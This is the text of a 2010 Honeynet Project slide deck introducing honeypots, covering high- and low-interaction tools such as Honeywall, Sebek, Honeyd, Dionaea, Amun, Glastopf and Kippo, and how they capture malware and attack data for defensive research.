USE

Honeypots
TO KNOW YOUR ENEMIES

Adel Karimi
The Honeynet Project

Nov 14, 2010

Speaker
Adel Karimi
Member of The Honeynet Project (Iranian Chapter Lead) Editor-in-chief of Snoop Security Ezine M.S. Student @ Tehran Polytechnic

Agenda
About The Honeynet Project Introduction to Honeypot High-Interaction Honeypots Low-Interaction Honeypots Client Honeypots

The Honeynet Project

Founded in 1999, The Honeynet Project is an international, non-profit research organization dedicated to improving the security of the Internet at no cost to the public. We accomplish this goal in the following three ways:
Awareness - We raise awareness of the threats and vulnerabilities that exist in the Internet today Information - For those who are already aware and concerned, we provide details to better secure and defend your resources Tools

~ 40 International Chapters

Iranian Honeynet Chapter

Honeynet Project Challenges

Learn about threats, analyze attacks, and share findnings.. //honeynet.org/challenges

Past Challenges:
Challenge 6 - Analyzing Malicious Portable Destructive Files Challenge 5 - Log Mysteries Challenge 4 - VoIP Challenge 3 - banking troubles Challenge 2 - browsers under attack Challenge 1 - pcap attack trace

Honeypots
Definition: A honeypot is a security resource whose value lies in being probed, attacked, or compromised.
- Lance Spitzner

Has no production value, anything going to or from a honeypot is likely a probe, attack or compromise

Honeypots
Uses of honeypots
Slowing down and following incoming attackers Catching and analyzing 0-days, malwares, botnets, and so on Improving intrusion detection systems
SurfIDS Nebula (An Intrusion Signature Generator)

To learn the tools, tactics and motives involved in computer and network attacks.

SurfIDS

Features: Distributed sensors, Central honeypot deployment, Central logging.

Honeypots
Honeypot vs. IDS Honeynet:
A network of [High-Interaction] honeypots Main requirements:
Data Control Data Capture Data Analysis Data Collection

Types of Honeypots
Production vs. Research honeypots:
Production honeypots protect an organization, while research honeypots are used to learn.

Different Types:
High-Interaction
Real environment

Low-Interaction
Simulated resource(s)

Physical vs. Virtual !?

High-Interaction Honeypots
Honeywall For capturing, controlling and analyzing attacks
It creates an architecture that allows you to deploy both LI and HI honeypots, but is designed primarily for HI. Layer 2 bridging device (Based on CentOS 5) Tools:
IPtables Snort_inline Snort Hflow P0f Argus Sebek Walleye

Walleye web interface

Honeywall

High-Interaction Honeypots
SEBEK
For data capture Hidden kernel module that captures all activities

High-Interaction Honeypots
Qebek (QEMU Sebek)
A QEMU based HI honeypot monitoring tool which aims at improving the invisibility of monitoring the attackers activities in HI honeypots. Two techniques: Virtual machine introspection (VMI) and system view reconstruction (SVR).
VMI enabled the IDS or other security system to monitor the system events from outside the virtual machine, while SVR allows the monitoring system to reconstruct meaningful high OSlevel information from the raw hardware-level information generated by VMI
Read the recently published KYT paper, Qebek - Conceal the Monitoring
- The paper is available from http://honeynet.org/papers/KYT_qebek

Low-Interaction Honeypots
Honeyd
Written by Niels Provos in 2002. Available at www.honeyd.org Features:
Simulates thousands of virtual hosts at the same time Configuration of arbitrary services via simple configuration file Simulates operating systems at TCP/IP stack level Tarpit Dynamic templates Subsystem virtualization:
Run real UNIX applications under virtual Honeyd IP addresses

Low-Interaction Honeypots
Nepenthes
Nepenthes is a versatile tool to collect malware. It acts passively by emulating known vulnerabilities and downloading malware trying to exploit these vulnerabilities.
(Excerpt from Nepenthes website)

Nepenthes is outdated
Do not use Nepenthes, use Dionaea instead. Read why: http://carnivore.it/2009/10/27/introducting_dionaea

 PHARM - is a client/server tool to manage, report and analyze all your distributed nepenthes instances from one interface.

Low-Interaction Honeypots
Mwcollect
mwcollectd is a versatile malware collection daemon, uniting the best features of nepenthes and honeytrap.

Low-Interaction Honeypots
Dionaea
Nepenthes successor Dionaea intention is to trap malware exploiting vulnerabilities exposed by services offerd to a network.

Features:
Static state machines to emulate vulnerable service Pattern matching to extract values from shellcode Download copies of the attacking worm Store on disc, or submit to a sandbox

Dionaea
Features:
Implement required parts of the SMB protocol Uses libemu (Beyond pattern matching) Less services, better emulation and better logging..

Low-Interaction Honeypots
Amun A Python Honeypot
Basically a nepenthes port to python

Amun
A sample of collected attack data from Amun:

Amun

DEMO
//Using Metasploit to Launch an Attack against Amun (MS08-067)

Source: http://amunhoney.sourceforge.net

Low-Interaction Honeypots
A new approach..

Glastopf A dynamic, LI web-app honeypot

A minimalistic web server written in Python Collects information about web application-based attacks like RFI, SQL injection, and LFI Glastopf scans the incoming request for strings like =http:// or =ftp:// Try to download and analyze the file and respond as close as possible to the attacker's expectations The attacker sends us for example a bot, shell or spreader

Client Honeypots
What is a HoneyClient!?
Drive-by Download Attacks

Source: Canadian Honeynet Project

Source: http://www.honeynet.org/papers/mw

Other Types of Honeypots

WiFi Honeypot VoIP Honeypot
VoIP Honey Artemisa

SSH Honeypot
Kippo Kojoney

Conclusion
You can use Honeypots to know your enemies..!
Collecting Malwares Tracking Botnets

Virtual Honeypots: From Botnet Tracking to Intrusion Detection By Niels Provos, Thorsten Holz

Use Honeypots to Know Your Enemies

By Adel Karimi Iranian Honeynet Chapter adel.net at Gmail.com

Thank You..